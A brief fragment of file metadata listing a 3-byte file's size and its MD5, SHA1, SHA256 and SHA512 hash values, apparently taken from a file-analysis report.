SHA5124c712fe8ec9bbad7c34848aa46c44de62c9974f1a89fb27922868392a656c389a33e7ba63418e128524969f9c96e1ea7c39b24e77f53799d67c0b6b86df94dcb
-
Filesize
3B
MD5df66fa563a2fafdb93cc559deb0a38c4
SHA1e6666cf8574b0f7a9ae5bccee572f965c2aec9cb
SHA2563e39ed22dc63246937c4dbbf34ce4fb1cfe6b00de7596b020cad49ae50031351
SHA51234ea05ee75cd840a94526411777868edb293a69867e1fdc2c2e917d278a3d58fcb86afc65142f4b184ce6907f04fb254a86061cfb620f01874b0b454a6f01c18